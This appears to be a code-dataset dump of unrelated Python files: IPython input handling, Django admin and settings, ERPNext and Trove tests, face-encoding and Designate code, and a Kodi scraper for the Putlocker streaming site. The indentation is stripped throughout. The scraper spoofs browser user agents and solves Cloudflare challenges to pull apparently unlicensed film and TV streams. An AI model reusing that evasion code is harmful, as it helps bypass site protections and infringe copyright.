super(IPythonInputSplitter, self).__init__()
self._buffer_raw = []
self._validate = True
if physical_line_transforms is not None:
self.physical_line_transforms = physical_line_transforms
else:
self.physical_line_transforms = [
leading_indent(),
classic_prompt(),
ipy_prompt(),
cellmagic(end_on_blank_line=line_input_checker),
]
self.assemble_logical_lines = assemble_logical_lines()
if logical_line_transforms is not None:
self.logical_line_transforms = logical_line_transforms
else:
self.logical_line_transforms = [
help_end(),
escaped_commands(),
assign_from_magic(),
assign_from_system(),
]
self.assemble_python_lines = assemble_python_lines()
if python_line_transforms is not None:
self.python_line_transforms = python_line_transforms
else:
# We don't use any of these at present
self.python_line_transforms = []
@property
def transforms(self):
"Quick access to all transformers."
return self.physical_line_transforms + \
[self.assemble_logical_lines] + self.logical_line_transforms + \
[self.assemble_python_lines] + self.python_line_transforms
@property
def transforms_in_use(self):
"""Transformers, excluding logical line transformers if we're in a
Python line."""
t = self.physical_line_transforms[:]
if not self.within_python_line:
t += [self.assemble_logical_lines] + self.logical_line_transforms
return t + [self.assemble_python_lines] + self.python_line_transforms
def reset(self):
"""Reset the input buffer and associated state."""
super(IPythonInputSplitter, self).reset()
self._buffer_raw[:] = []
self.source_raw = ''
self.transformer_accumulating = False
self.within_python_line = False
for t in self.transforms:
try:
t.reset()
except SyntaxError:
# Nothing that calls reset() expects to handle transformer
# errors
pass
def flush_transformers(self):
def _flush(transform, outs):
"""yield transformed lines
always strings, never None
transform: the current transform
outs: an iterable of previously transformed inputs.
Each may be multiline, which will be passed
one line at a time to transform.
"""
for out in outs:
for line in out.splitlines():
# push one line at a time
tmp = transform.push(line)
if tmp is not None:
yield tmp
# reset the transform
tmp = transform.reset()
if tmp is not None:
yield tmp
out = []
for t in self.transforms_in_use:
out = _flush(t, out)
out = list(out)
if out:
self._store('\n'.join(out))
def raw_reset(self):
"""Return raw input only and perform a full reset.
"""
out = self.source_raw
self.reset()
return out
def source_reset(self):
try:
self.flush_transformers()
return self.source
finally:
self.reset()
def push_accepts_more(self):
if self.transformer_accumulating:
return True
else:
return super(IPythonInputSplitter, self).push_accepts_more()
def transform_cell(self, cell):
"""Process and translate a cell of input.
"""
self.reset()
try:
self.push(cell)
self.flush_transformers()
return self.source
finally:
self.reset()
def push(self, lines:str) -> bool:
"""Push one or more lines of IPython input.
This stores the given lines and returns a status code indicating
whether the code forms a complete Python block or not, after processing
all input lines for special IPython syntax.
Any exceptions generated in compilation are swallowed, but if an
exception was produced, the method returns True.
Parameters
----------
lines : string
One or more lines of Python input.
Returns
-------
is_complete : boolean
True if the current input source (the result of the current input
plus prior inputs) forms a complete Python execution block. Note that
this value is also stored as a private attribute (_is_complete), so it
can be queried at any time.
"""
assert isinstance(lines, str)
# We must ensure all input is pure unicode
# ''.splitlines() --> [], but we need to push the empty line to transformers
lines_list = lines.splitlines()
if not lines_list:
lines_list = ['']
# Store raw source before applying any transformations to it. Note
# that this must be done *after* the reset() call that would otherwise
# flush the buffer.
self._store(lines, self._buffer_raw, 'source_raw')
transformed_lines_list = []
for line in lines_list:
transformed = self._transform_line(line)
if transformed is not None:
transformed_lines_list.append(transformed)
if transformed_lines_list:
transformed_lines = '\n'.join(transformed_lines_list)
return super(IPythonInputSplitter, self).push(transformed_lines)
else:
# Got nothing back from transformers - they must be waiting for
# more input.
return False
def _transform_line(self, line):
"""Push a line of input code through the various transformers.
Returns any output from the transformers, or None if a transformer
is accumulating lines.
Sets self.transformer_accumulating as a side effect.
"""
def _accumulating(dbg):
#print(dbg)
self.transformer_accumulating = True
return None
for transformer in self.physical_line_transforms:
line = transformer.push(line)
if line is None:
return _accumulating(transformer)
if not self.within_python_line:
line = self.assemble_logical_lines.push(line)
if line is None:
return _accumulating('acc logical line')
for transformer in self.logical_line_transforms:
line = transformer.push(line)
if line is None:
return _accumulating(transformer)
line = self.assemble_python_lines.push(line)
if line is None:
self.within_python_line = True
return _accumulating('acc python line')
else:
self.within_python_line = False
for transformer in self.python_line_transforms:
line = transformer.push(line)
if line is None:
return _accumulating(transformer)
#print("transformers clear") #debug
self.transformer_accumulating = False
return line
|
mit
| 8,784,860,315,369,942,000
| 35.470207
| 109
| 0.58764
| false
| 4.60049
| false
| false
| false
|
Ajapaik/ajapaik-web
|
ajapaik/ajapaik_face_recognition/management/commands/run_face_encoding_on_unencoded_rectangles.py
|
1
|
1387
|
import multiprocessing
from json import loads, dumps
import face_recognition
from django.core.management.base import BaseCommand
from ajapaik.ajapaik_face_recognition.models import FaceRecognitionRectangle
def encode_single_rectangle(rectangle: FaceRecognitionRectangle) -> None:
print('Processing rectangle %s' % rectangle.pk)
try:
image = face_recognition.load_image_file(rectangle.photo.image)
except: # noqa
return
try:
encodings = face_recognition.face_encodings(image, known_face_locations=[loads(rectangle.coordinates)])
except: # noqa
return
if len(encodings) == 1:
my_encoding = encodings[0]
try:
rectangle.face_encoding = dumps(my_encoding.tolist())
rectangle.save()
except: # noqa
return
else:
print('Found % face encodings for rectangle %s, should find only 1' % (len(encodings), rectangle.id))
class Command(BaseCommand):
help = 'Will run face encoding on all identified faces'
args = 'subject_id'
def handle(self, *args, **options):
unknown_rectangles = FaceRecognitionRectangle.objects.filter(face_encoding__isnull=True).all()
print('Found %s rectangles to run on' % unknown_rectangles.count())
with multiprocessing.Pool() as pool:
pool.map(encode_single_rectangle, unknown_rectangles)
|
gpl-3.0
| -8,899,417,717,405,903,000
| 34.564103
| 111
| 0.681327
| false
| 4.031977
| false
| false
| false
|
Tejal011089/trufil-erpnext
|
erpnext/stock/doctype/item/test_item.py
|
1
|
2870
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import frappe
from frappe.test_runner import make_test_records
from erpnext.stock.doctype.item.item import WarehouseNotSet, ItemTemplateCannotHaveStock
from erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry
test_ignore = ["BOM"]
test_dependencies = ["Warehouse"]
def make_item(item_code, properties=None):
if frappe.db.exists("Item", item_code):
return frappe.get_doc("Item", item_code)
item = frappe.get_doc({
"doctype": "Item",
"item_code": item_code,
"item_name": item_code,
"description": item_code,
"item_group": "Products"
})
if properties:
item.update(properties)
if item.is_stock_item and not item.default_warehouse:
item.default_warehouse = "_Test Warehouse - _TC"
item.insert()
return item
class TestItem(unittest.TestCase):
def get_item(self, idx):
item_code = test_records[idx].get("item_code")
if not frappe.db.exists("Item", item_code):
item = frappe.copy_doc(test_records[idx])
item.insert()
else:
item = frappe.get_doc("Item", item_code)
return item
def test_template_cannot_have_stock(self):
item = self.get_item(10)
make_stock_entry(item_code=item.name, target="Stores - _TC", qty=1, incoming_rate=1)
item.has_variants = 1
self.assertRaises(ItemTemplateCannotHaveStock, item.save)
def test_default_warehouse(self):
item = frappe.copy_doc(test_records[0])
item.is_stock_item = 1
item.default_warehouse = None
self.assertRaises(WarehouseNotSet, item.insert)
def test_get_item_details(self):
from erpnext.stock.get_item_details import get_item_details
to_check = {
"item_code": "_Test Item",
"item_name": "_Test Item",
"description": "_Test Item 1",
"warehouse": "_Test Warehouse - _TC",
"income_account": "Sales - _TC",
"expense_account": "_Test Account Cost for Goods Sold - _TC",
"cost_center": "_Test Cost Center 2 - _TC",
"qty": 1.0,
"price_list_rate": 100.0,
"base_price_list_rate": 0.0,
"discount_percentage": 0.0,
"rate": 0.0,
"base_rate": 0.0,
"amount": 0.0,
"base_amount": 0.0,
"batch_no": None,
"item_tax_rate": '{}',
"uom": "_Test UOM",
"conversion_factor": 1.0,
}
make_test_records("Item Price")
details = get_item_details({
"item_code": "_Test Item",
"company": "_Test Company",
"price_list": "_Test Price List",
"currency": "_Test Currency",
"parenttype": "Sales Order",
"conversion_rate": 1,
"price_list_currency": "_Test Currency",
"plc_conversion_rate": 1,
"order_type": "Sales",
"transaction_type": "selling"
})
for key, value in to_check.iteritems():
self.assertEquals(value, details.get(key))
test_records = frappe.get_test_records('Item')
|
agpl-3.0
| -5,232,201,362,335,797,000
| 27.137255
| 88
| 0.674913
| false
| 2.937564
| true
| false
| false
|
petterreinholdtsen/frikanalen
|
fkbeta/fk/admin.py
|
1
|
2538
|
# Copyright (c) 2012-2013 Benjamin Bruheim <grolgh@gmail.com>
# This file is covered by the LGPLv3 or later, read COPYING for details.
from django.contrib import admin
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin
from fk.models import FileFormat
from fk.models import Organization
from fk.models import UserProfile
from fk.models import Video, Category, Scheduleitem
from fk.models import VideoFile
from fk.models import SchedulePurpose, WeeklySlot
# In order to display the userprofile on
admin.site.unregister(User)
class UserProfileInline(admin.StackedInline):
model = UserProfile
class UserProfileAdmin(UserAdmin):
inlines = [ UserProfileInline, ]
class VideoFileInline(admin.StackedInline):
fields = ('format', 'filename', 'old_filename')
#readonly_fields = ['format', 'filename']
model = VideoFile
extra = 0
class VideoAdmin(admin.ModelAdmin):
list_display = ('name', 'editor', 'organization')
inlines = [VideoFileInline]
search_fields = ["name", "description", "organization__name", "header", "editor__username"]
list_filter = ("proper_import", "is_filler", "publish_on_web", "has_tono_records")
class OrganizationAdmin(admin.ModelAdmin):
list_display = ('name', 'fkmember', 'orgnr')
filter_horizontal = ("members",)
list_filter = ('fkmember',)
ordering = ('name',)
class ScheduleitemAdmin(admin.ModelAdmin):
list_filter = ("starttime", )
list_display = ('__str__',
'video',
'schedulereason',
'starttime',
'duration')
#list_display_links = ('starttime', 'video',)
#inlines = [VideoInline]
#exclude = ('video',)
search_fields = ["video__name", "video__organization__name"]
ordering = ('starttime',)
class SchedulePurposeAdmin(admin.ModelAdmin):
list_display = (
'__str__',
'videos_str',
)
filter_horizontal = ('direct_videos',)
class WeeklySlotAdmin(admin.ModelAdmin):
list_display = (
'__str__',
'day',
'start_time',
'duration',
'purpose',
)
admin.site.register(Category)
admin.site.register(FileFormat)
admin.site.register(Organization, OrganizationAdmin)
admin.site.register(SchedulePurpose, SchedulePurposeAdmin)
admin.site.register(Scheduleitem, ScheduleitemAdmin)
admin.site.register(User, UserProfileAdmin)
admin.site.register(Video, VideoAdmin)
admin.site.register(VideoFile)
admin.site.register(WeeklySlot, WeeklySlotAdmin)
|
lgpl-3.0
| -431,953,171,379,978,940
| 31.126582
| 95
| 0.684791
| false
| 3.85129
| false
| false
| false
|
janusnic/ecommerce
|
ecommerce/settings/local.py
|
1
|
4047
|
"""Development settings and globals."""
from __future__ import absolute_import
import os
from os.path import join, normpath
from ecommerce.settings.base import *
from ecommerce.settings.logger import get_logger_config
# DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
# END DEBUG CONFIGURATION
# EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# END EMAIL CONFIGURATION
# DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': normpath(join(DJANGO_ROOT, 'default.db')),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
'ATOMIC_REQUESTS': True,
}
}
# END DATABASE CONFIGURATION
# CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# END CACHE CONFIGURATION
# TOOLBAR CONFIGURATION
# See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup
if os.environ.get('ENABLE_DJANGO_TOOLBAR', False):
INSTALLED_APPS += (
'debug_toolbar',
)
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
INTERNAL_IPS = ('127.0.0.1',)
# END TOOLBAR CONFIGURATION
# URL CONFIGURATION
ECOMMERCE_URL_ROOT = 'http://localhost:8002'
LMS_URL_ROOT = 'http://127.0.0.1:8000'
# The location of the LMS heartbeat page
LMS_HEARTBEAT_URL = get_lms_url('/heartbeat')
# The location of the LMS student dashboard
LMS_DASHBOARD_URL = get_lms_url('/dashboard')
OAUTH2_PROVIDER_URL = get_lms_url('/oauth2')
COMMERCE_API_URL = get_lms_url('/api/commerce/v1/')
# END URL CONFIGURATION
# AUTHENTICATION
# Set these to the correct values for your OAuth2/OpenID Connect provider (e.g., devstack)
SOCIAL_AUTH_EDX_OIDC_KEY = 'replace-me'
SOCIAL_AUTH_EDX_OIDC_SECRET = 'replace-me'
SOCIAL_AUTH_EDX_OIDC_URL_ROOT = OAUTH2_PROVIDER_URL
SOCIAL_AUTH_EDX_OIDC_ID_TOKEN_DECRYPTION_KEY = SOCIAL_AUTH_EDX_OIDC_SECRET
JWT_AUTH.update({
'JWT_SECRET_KEY': 'insecure-secret-key',
'JWT_ISSUER': OAUTH2_PROVIDER_URL
})
# END AUTHENTICATION
# ORDER PROCESSING
ENROLLMENT_API_URL = get_lms_url('/api/enrollment/v1/enrollment')
ENROLLMENT_FULFILLMENT_TIMEOUT = 15 # devstack is slow!
EDX_API_KEY = 'replace-me'
# END ORDER PROCESSING
# PAYMENT PROCESSING
PAYMENT_PROCESSOR_CONFIG = {
'cybersource': {
'soap_api_url': 'https://ics2wstest.ic3.com/commerce/1.x/transactionProcessor/CyberSourceTransaction_1.115.wsdl',
'merchant_id': 'fake-merchant-id',
'transaction_key': 'fake-transaction-key',
'profile_id': 'fake-profile-id',
'access_key': 'fake-access-key',
'secret_key': 'fake-secret-key',
'payment_page_url': 'https://testsecureacceptance.cybersource.com/pay',
'receipt_page_url': get_lms_url('/commerce/checkout/receipt/'),
'cancel_page_url': get_lms_url('/commerce/checkout/cancel/'),
},
'paypal': {
'mode': 'sandbox',
'client_id': 'fake-client-id',
'client_secret': 'fake-client-secret',
'receipt_url': get_lms_url('/commerce/checkout/receipt/'),
'cancel_url': get_lms_url('/commerce/checkout/cancel/'),
},
}
# END PAYMENT PROCESSING
ENABLE_AUTO_AUTH = True
LOGGING = get_logger_config(debug=DEBUG, dev_env=True, local_loglevel='DEBUG')
#####################################################################
# Lastly, see if the developer has any local overrides.
try:
from .private import * # pylint: disable=import-error
except ImportError:
pass
|
agpl-3.0
| -3,845,165,324,190,291,000
| 27.907143
| 121
| 0.677045
| false
| 3.227273
| true
| false
| false
|
mmasaki/trove
|
trove/tests/tempest/tests/api/versions/test_versions.py
|
1
|
1650
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from testtools import testcase as testtools
from trove.tests.tempest.tests.api import base
class DatabaseVersionsTest(base.BaseDatabaseTest):
@classmethod
def setup_clients(cls):
super(DatabaseVersionsTest, cls).setup_clients()
cls.client = cls.database_versions_client
@testtools.attr('smoke')
@decorators.idempotent_id('6952cd77-90cd-4dca-bb60-8e2c797940cf')
def test_list_db_versions(self):
versions = self.client.list_db_versions()['versions']
self.assertTrue(len(versions) > 0, "No database versions found")
# List of all versions should contain the current version, and there
# should only be one 'current' version
current_versions = list()
for version in versions:
if 'CURRENT' == version['status']:
current_versions.append(version['id'])
self.assertEqual(1, len(current_versions))
self.assertIn(self.db_current_version, current_versions)
|
apache-2.0
| -8,393,112,534,774,205,000
| 39.243902
| 78
| 0.704242
| false
| 4.084158
| true
| false
| false
|
felipenaselva/repo.felipe
|
plugin.video.velocity/scrapers/putlocker_both.py
|
1
|
15716
|
import urllib2,urllib,re,os
import random
import urlparse
import sys
import xbmcplugin,xbmcgui,xbmc, xbmcaddon, downloader, extract, time
import tools
from libs import kodi
from tm_libs import dom_parser
from libs import log_utils
import tools
from libs import cloudflare
from libs import log_utils
from tm_libs import dom_parser
import cookielib
from StringIO import StringIO
import gzip
import main_scrape
import base64
addon_id = kodi.addon_id
timeout = int(kodi.get_setting('scraper_timeout'))
tools.create_directory(tools.AOPATH, "All_Cookies/Putlocker")
cookiepath = xbmc.translatePath(os.path.join('special://home','addons',addon_id,'All_Cookies','Putlocker/'))
cookiejar = os.path.join(cookiepath,'cookies.lwp')
cj = cookielib.LWPCookieJar()
cookie_file = os.path.join(cookiepath,'cookies.lwp')
def __enum(**enums):
return type('Enum', (), enums)
MAX_RESPONSE = 1024 * 1024 * 2
FORCE_NO_MATCH = '***FORCE_NO_MATCH***'
QUALITIES = __enum(LOW='Low', MEDIUM='Medium', HIGH='High', HD720='HD720', HD1080='HD1080')
XHR = {'X-Requested-With': 'XMLHttpRequest'}
USER_AGENT = "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
BR_VERS = [
['%s.0' % i for i in xrange(18, 43)],
['37.0.2062.103', '37.0.2062.120', '37.0.2062.124', '38.0.2125.101', '38.0.2125.104', '38.0.2125.111', '39.0.2171.71', '39.0.2171.95', '39.0.2171.99', '40.0.2214.93', '40.0.2214.111',
'40.0.2214.115', '42.0.2311.90', '42.0.2311.135', '42.0.2311.152', '43.0.2357.81', '43.0.2357.124', '44.0.2403.155', '44.0.2403.157', '45.0.2454.101', '45.0.2454.85', '46.0.2490.71',
'46.0.2490.80', '46.0.2490.86', '47.0.2526.73', '47.0.2526.80'],
['11.0']]
WIN_VERS = ['Windows NT 10.0', 'Windows NT 7.0', 'Windows NT 6.3', 'Windows NT 6.2', 'Windows NT 6.1', 'Windows NT 6.0', 'Windows NT 5.1', 'Windows NT 5.0']
FEATURES = ['; WOW64', '; Win64; IA64', '; Win64; x64', '']
RAND_UAS = ['Mozilla/5.0 ({win_ver}{feature}; rv:{br_ver}) Gecko/20100101 Firefox/{br_ver}',
'Mozilla/5.0 ({win_ver}{feature}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{br_ver} Safari/537.36',
'Mozilla/5.0 ({win_ver}{feature}; Trident/7.0; rv:{br_ver}) like Gecko']
HOST_Q = {}
HOST_Q[QUALITIES.LOW] = ['youwatch', 'allmyvideos', 'played.to', 'gorillavid']
HOST_Q[QUALITIES.MEDIUM] = ['primeshare', 'exashare', 'bestreams', 'flashx', 'vidto', 'vodlocker', 'thevideo', 'vidzi', 'vidbull',
'realvid', 'nosvideo', 'daclips', 'sharerepo', 'zalaa', 'filehoot', 'vshare']
HOST_Q[QUALITIES.HIGH] = ['vidspot', 'mrfile', 'divxstage', 'streamcloud', 'mooshare', 'novamov', 'mail.ru', 'vid.ag']
HOST_Q[QUALITIES.HD720] = ['thefile', 'sharesix', 'filenuke', 'vidxden', 'movshare', 'nowvideo', 'vidbux', 'streamin.to', 'allvid.ch']
HOST_Q[QUALITIES.HD1080] = ['hugefiles', '180upload', 'mightyupload', 'videomega', 'allmyvideos']
Q_ORDER = {QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5}
# base_url = 'http://www.santaseries.com'
base_url = kodi.get_setting('putlocker_base_url')
def format_source_label( item):
if 'label' in item:
return '[%s] %s (%s)' % (item['quality'], item['host'], item['label'])
else:
return '[%s] %s' % (item['quality'], item['host'])
def _http_get(url, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8):
return get_cooked_url(url, base_url, timeout, cookies=cookies, data=data, multipart_data=multipart_data,
headers=headers, allow_redirect=allow_redirect, cache_limit=cache_limit)
def get_cooked_url(url, base_url, timeout, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8):
if cookies is None: cookies = {}
if timeout == 0: timeout = None
if headers is None: headers = {}
referer = headers['Referer'] if 'Referer' in headers else url
if kodi.get_setting('debug') == "true":
log_utils.log('Getting Url: %s cookie=|%s| data=|%s| extra headers=|%s|' % (url, cookies, data, headers))
if data is not None:
if isinstance(data, basestring):
data = data
else:
data = urllib.urlencode(data, True)
if multipart_data is not None:
headers['Content-Type'] = 'multipart/form-data; boundary=X-X-X'
data = multipart_data
try:
cj = _set_cookies(base_url, cookies)
request = urllib2.Request(url, data=data)
request.add_header('User-Agent', _get_ua())
#request.add_unredirected_header('Host', base_url)
request.add_unredirected_header('Referer', referer)
for key in headers: request.add_header(key, headers[key])
cj.add_cookie_header(request)
if not allow_redirect:
opener = urllib2.build_opener(NoRedirection)
urllib2.install_opener(opener)
else:
opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
urllib2.install_opener(opener)
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener2)
response = urllib2.urlopen(request, timeout=timeout)
cj.extract_cookies(response, request)
if kodi.get_setting('debug') == "true":
print 'Response Cookies: %s - %s' % (url, cookies_as_str(cj))
__fix_bad_cookies()
cj.save(ignore_discard=True)
if not allow_redirect and (response.getcode() in [301, 302, 303, 307] or response.info().getheader('Refresh')):
if response.info().getheader('Refresh') is not None:
refresh = response.info().getheader('Refresh')
return refresh.split(';')[-1].split('url=')[-1]
else:
return response.info().getheader('Location')
content_length = response.info().getheader('Content-Length', 0)
if int(content_length) > MAX_RESPONSE:
print 'Response exceeded allowed size. %s => %s / %s' % (url, content_length, MAX_RESPONSE)
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read(MAX_RESPONSE))
f = gzip.GzipFile(fileobj=buf)
html = f.read()
else:
html = response.read(MAX_RESPONSE)
except urllib2.HTTPError as e:
if e.code == 503 and 'cf-browser-verification' in e.read():
print "WAS ERROR"
html = cloudflare.solve(url, cj, _get_ua())
if not html:
return ''
else:
print 'Error (%s) during THE scraper http get: %s' % (str(e), url)
return ''
except Exception as e:
print 'Error (%s) during scraper http get: %s' % (str(e), url)
return ''
return html
def get_url(url):
request=urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36')
response=urllib2.urlopen(request)
link=response.read()
cj.save(cookie_file, ignore_discard=True)
response.close()
return link
def _get_ua():
index = random.randrange(len(RAND_UAS))
user_agent = RAND_UAS[index].format(win_ver=random.choice(WIN_VERS), feature=random.choice(FEATURES), br_ver=random.choice(BR_VERS[index]))
print 'Creating New User Agent: %s' % (user_agent)
return user_agent
def _pathify_url(url):
url = url.replace('\/', '/')
pieces = urlparse.urlparse(url)
if pieces.scheme:
strip = pieces.scheme + ':'
else:
strip = ''
strip += '//' + pieces.netloc
url = url.replace(strip, '')
if not url.startswith('/'): url = '/' + url
url = url.replace('/./', '/')
print "returning pathify "+ url
return url
def _default_get_episode_url(show_url, video, episode_pattern, title_pattern='', airdate_pattern='', data=None, headers=None):
if 'http://' not in show_url:
url = urlparse.urljoin(base_url, show_url)
else:
url = base_url+show_url
html = get_url(url)
if html:
match = re.search(episode_pattern, html, re.DOTALL)
if match:
return _pathify_url(match.group(1))
else:
log_utils.log('Skipping as Episode not found: %s' % (url), log_utils.LOGDEBUG)
def make_vid_params(video_type, title, year, season, episode, ep_title, ep_airdate):
return '|%s|%s|%s|%s|%s|%s|%s|' % (video_type, title, year, season, episode, ep_title, ep_airdate)
def _set_cookies(base_url, cookies):
cj = cookielib.LWPCookieJar(cookie_file)
try: cj.load(ignore_discard=True)
except: pass
if kodi.get_setting('debug') == "true":
print 'Before Cookies: %s' % (cookies_as_str(cj))
domain = urlparse.urlsplit(base_url).hostname
for key in cookies:
c = cookielib.Cookie(0, key, str(cookies[key]), port=None, port_specified=False, domain=domain, domain_specified=True,
domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=False, comment=None,
comment_url=None, rest={})
cj.set_cookie(c)
cj.save(ignore_discard=True)
if kodi.get_setting('debug') == "true":
print 'After Cookies: %s' % (cookies_as_str(cj))
return cj
def cookies_as_str(cj):
s = ''
c = cj._cookies
for domain in c:
s += '{%s: ' % (domain)
for path in c[domain]:
s += '{%s: ' % (path)
for cookie in c[domain][path]:
s += '{%s=%s}' % (cookie, c[domain][path][cookie].value)
s += '}'
s += '} '
return s
def __fix_bad_cookies():
c = cj._cookies
for domain in c:
for path in c[domain]:
for key in c[domain][path]:
cookie = c[domain][path][key]
if cookie.expires > sys.maxint:
print 'Fixing cookie expiration for %s: was: %s now: %s' % (key, cookie.expires, sys.maxint)
cookie.expires = sys.maxint
def get_quality(video, host, base_quality=None):
host = host.lower()
# Assume movies are low quality, tv shows are high quality
if base_quality is None:
if video.video_type == "movies":
quality = QUALITIES.LOW
else:
quality = QUALITIES.HIGH
else:
quality = base_quality
host_quality = None
if host:
for key in HOST_Q:
if any(hostname in host for hostname in HOST_Q[key]):
host_quality = key
break
if host_quality is not None and Q_ORDER[host_quality] < Q_ORDER[quality]:
quality = host_quality
return quality
################ Below is custome Changes per Scraper#################
def _get_episode_url(show_url, video,season,episode):
episode_pattern = 'href="([^"]+season-%s-episode-%s-[^"]+)' % (season, episode)
title_pattern = 'href="(?P<url>[^"]+season-\d+-episode-\d+-[^"]+).*? \s+(?P<title>.*?)</td>'
return _default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def search(video_type, title, year):
search_url = urlparse.urljoin(base_url, '/search/advanced_search.php?q=%s' % (urllib.quote_plus(title)))
if not year: year = 'Year'
search_url += '&year_from=%s&year_to=%s' % (year, year)
if video_type == "shows":
search_url += '§ion=2'
else:
search_url += '§ion=1'
html = _http_get(search_url, cache_limit=.25)
results = []
if not re.search('Sorry.*?find.*?looking\s+for', html, re.I):
r = re.search('Search Results For: "(.*?)</table>', html, re.DOTALL)
if r:
fragment = r.group(1)
pattern = r'<a\s+href="([^"]+)"\s+title="([^"]+)'
for match in re.finditer(pattern, fragment):
url, title_year = match.groups('')
match = re.search('(.*)\s+\((\d{4})\)', title_year)
if match:
match_title, match_year = match.groups()
else:
match_title = title_year
match_year = ''
result = {'url': _pathify_url(url), 'title': match_title, 'year': match_year}
results.append(result)
results = dict((result['url'], result) for result in results).values()
return results
def get_sources(video):
source_url = urlparse.urljoin(base_url, video)
#source_url = get_url(video)
hosters = []
if source_url and source_url != FORCE_NO_MATCH:
url = urlparse.urljoin(base_url, source_url)
html = _http_get(url, cache_limit=.5)
for match in re.finditer('<a[^>]+href="([^"]+)[^>]+>(Version \d+)<', html):
url, version = match.groups()
host = urlparse.urlsplit(url).hostname.replace('embed.', '')
hoster = {'hostname':'Putlocker','multi-part': False, 'host': host, 'quality': get_quality(video, host, QUALITIES.HIGH), 'views': None, 'rating': None, 'url': url, 'direct': False}
hoster['version'] = version
hosters.append(hoster)
return hosters
def putlocker_tv(name,movie_title):
try:
title = movie_title[:-7]
movie_year = movie_title[-6:]
year = movie_year.replace('(','').replace(')','')
video_type = 'shows'
show_url = search(video_type,title,year)
for e in show_url:
url = e['url']
newseas=re.compile('S(.+?)E(.+?) (?P<name>[A-Za-z\t .]+)').findall(name)
print newseas
for sea,epi,epi_title in newseas:
video = make_vid_params('Episode',title,year,sea,epi,epi_title,'')
ep_url = _get_episode_url(url, video,sea,epi)
hosters=get_sources(ep_url)
hosters = main_scrape.apply_urlresolver(hosters)
return hosters
except Exception as e:
hosters =[]
log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR)
if kodi.get_setting('error_notify') == "true":
kodi.notify(header='Putlocker TV',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None)
return hosters
def putlocker_movies(movie_title):
try:
title = movie_title[:-7]
movie_year = movie_title[-6:]
year = movie_year.replace('(','').replace(')','')
video_type = 'movies'
show_url = search(video_type,title,year)
for e in show_url:
url = e['url']
hosters=get_sources(url)
print "HOSTERS ARE " + str(hosters)
hosters = main_scrape.apply_urlresolver(hosters)
return hosters
except Exception as e:
hosters =[]
log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR)
if kodi.get_setting('error_notify') == "true":
kodi.notify(header='Putlocker Movies',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None)
return hosters
|
gpl-2.0
| 3,591,408,890,174,926,000
| 40.033943
| 197
| 0.563311
| false
| 3.40026
| false
| false
| false
|
melodous/designate
|
designate/sqlalchemy/models.py
|
1
|
1881
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Author: Patrick Galbraith <patg@hp.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.db.sqlalchemy import models
from oslo.db import exception as oslo_db_exc
from sqlalchemy import Column, DateTime
from sqlalchemy.exc import IntegrityError
from sqlalchemy.types import CHAR
from designate.openstack.common import timeutils
from designate import exceptions
class Base(models.ModelBase):
# TODO(ekarlso): Remove me when o.db patch lands for this.
def save(self, session):
"""Save this object"""
session.add(self)
try:
session.flush()
except oslo_db_exc.DBDuplicateEntry as e:
raise exceptions.Duplicate(str(e))
except IntegrityError:
raise
def delete(self, session):
session.delete(self)
session.flush()
# TODO(ekarlso): Get this into o.db?
class SoftDeleteMixin(object):
deleted = Column(CHAR(32), nullable=False, default="0", server_default="0")
